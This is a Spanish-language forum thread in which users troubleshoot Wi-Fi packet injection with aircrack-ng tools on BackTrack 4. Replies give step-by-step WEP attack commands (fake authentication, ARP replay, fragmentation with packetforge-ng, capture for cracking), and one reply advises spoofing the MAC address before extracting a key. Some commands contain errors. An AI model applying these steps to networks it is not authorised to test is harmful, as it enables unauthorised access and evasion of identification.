Problema al inyectar

Mojitronky · 16-oct-2009, 16:08

Hola a todos!!!!
Vereis tengo un asus eeepc 1008ha con atheros ar9285 y estoy haciendo pruebas con mi WIFi y no consigo inyectar ningun paquete, nose si estaré haciendolo bien o no se que pasa...

Hago lo siguiente:
1-
airmon-ng start wlan0

wlan0 Atheros ath9 - [phy0]
(monitor mode enabled on mon0)

2-
aireplay-ng -1 0 -e ESSID AP -a MAC AP -h MI MAC wifi0

** aqui es donde surge el problema, sale:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Sending Association Request
18:18:20 Sending Association Request
18:18:20 Sending Association Request

i asi hasta que me dice que no se puede asociar y una lista de posibles fallos.

Por otra parte, decir que ahora mi wifi usa el canal 12 y ya me sale directamente el error de que el AP usa canal 12 y yo estoy conectando por el canal 10.

También le hago el test y parece que no funciona:

aireplay-ng --test mon0
trying broadcast probe requests...
no answer...
found 1 AP

trying directed probe requests...
xx:xx:Xx:xx:xx - channel:12 - 'WlanXX'
0/30 0%

Que es lo que puede estar fallando??? Hay otra manera de inyectar paquetes???

Gracias!!!!
Saludoss

KezinDazel · 16-oct-2009, 20:38

Buen dia analizando lo que escribistes

Código:

wlan0 Atheros ath9 - [phy0]
(monitor mode enabled on mon0)

tu tarjeta asigno otro por asi decirlo dispositvo en monitor en este caso mon0

Código:

aireplay-ng -1 0 -e ESSID AP -a MAC AP -h MI MAC wifi0

lo estas haciendo por una interfaz que no existe wifi0

quedaria del siguiente modo

Código:

aireplay-ng -1 0 -e ESSID[Nombre del AP] -a MAC AP[Direccion Fisica] -h MI MAC[O una MAC Falsa] mon0

Con esto inyectaras datos en caso que el AP no tenga cifrado MAC.

Haz otra ves las prueba y si te funciono vuelve a postear los resultados

Mojitronky · 18-oct-2009, 15:36

Hola! primero, gracias por responder.

No funciona, me dice:

Waiting for beacon frame (BSSID: XX:XX:XX:XX) on channel 2
No such BSSID aviable

No hay filtro de mac que yo sepa, es mi propia wifi a la que ataco. Y aqui conecto los equipos que sean y funcionan.

Probe una opcion del aireplay, que estaba leyendo paquetes y creo que espera a capturar un paquete ARP, en el momento lo capturo empezo a inyectar y a subirme en el airodump los DATA muy deprisa.

Lo que pasa que no me acuerdo que opcion, puede que sea la -3 ?? que puede estar pasandole a lo que estamos tratando??

Graciassss!!!!!!!!
saludosssssss

Mojitronky · 18-oct-2009, 15:42

se me olvidaba...
El router utiliza el canal 12, y con mi equipo puedo utilizar hasta el 11.
Puede que sea por esto, no???
aunque probando con otra wifi que utiliza el canal 6 tampoco pude.

El test me ha salido INJECTION IS WORKING!

saludosss

KezinDazel · 18-oct-2009, 18:44

1.- Estas escogiendo un AP ycanal en especifico ademas necesitas guardando los datos para realizar el crackero mediante.

airodump-ng -c CANAL --bssid MACAP -w ARCHIVOAGUARDAR INTERFAZ

antes de realizar la asociación e inyección.

2.-Si postearas imagenes de como realizar tu procedimiento podria corregirte mas facilmente los errores que tienes

Mojitronky · 19-oct-2009, 13:48

Pues esque lo hago desde el notebook y esto lo posteo desde el PC, entonces estoy escribiendo todo lo que me sale en el notebook aquí.
Por cierto, utilizo el BACKTRACK4, y no encuentro manuales por ahi, sabes si existe algo para enseñarme a manejar si no todas, casi todas las herramientas que este sistema lleva???

davidtxu · 21-oct-2009, 15:05

hola soy nuevo (recien registrado) y yo tambien estoy empezando a investigar con backtrack 4. He encontrado un manual te dejo aqui:

http://sites.google.com/site/mipeque...attredirects=0

ya me direis si os sirve de ayuda!

hidden · 30-oct-2009, 15:44

te voy a dejar 2 formas de inyectar paquetes...

Forma 1:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando

Forma 2:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -5 -b <BSSID> -h <mac> wlan0
ver como se llama el archivo .xor
# packetforge-ng -0 -a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y <archivo .xor> -w ARP
# aireplay-ng -2 -r ARP wlan0

hidden · 30-oct-2009, 22:09

Cita:

Iniciado por davidtxu

hola soy nuevo (recien registrado) y yo tambien estoy empezando a investigar con backtrack 4. He encontrado un manual te dejo aqui:

http://sites.google.com/site/mipeque...attredirects=0

ya me direis si os sirve de ayuda!

yo no intentaria extraer una clave sin antes ejecutar en el terminal

airodump-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55
airodump-ng start wlan0

solo es un consejo y en este tuto no te enseña a "cambiar" tu mac.

charangero · 15-feb-2010, 19:58

Hola y espero me ayuden pues de verdad soy nobato en esto.
resulta e estado haciando cositas en el blacktrack4 y leyendo logro hacer todo bien, despues que logro la asociociaon y inyecto todo parece estar bien pero las ACKs estan en 0 y las datas no suben.
por favor que me puede estar saliendo mal aqui e probado varias formas de inyeccion y mi tarjeta intecta pero no suben las datas.
algun consejo que me puedan dar.
mi tarjeta es una intel links 5100
si les hace falta algun dato mas pues diganmelo y con gusto se los dare, pero esto de verdad es bien extraño.
gracias de ante mano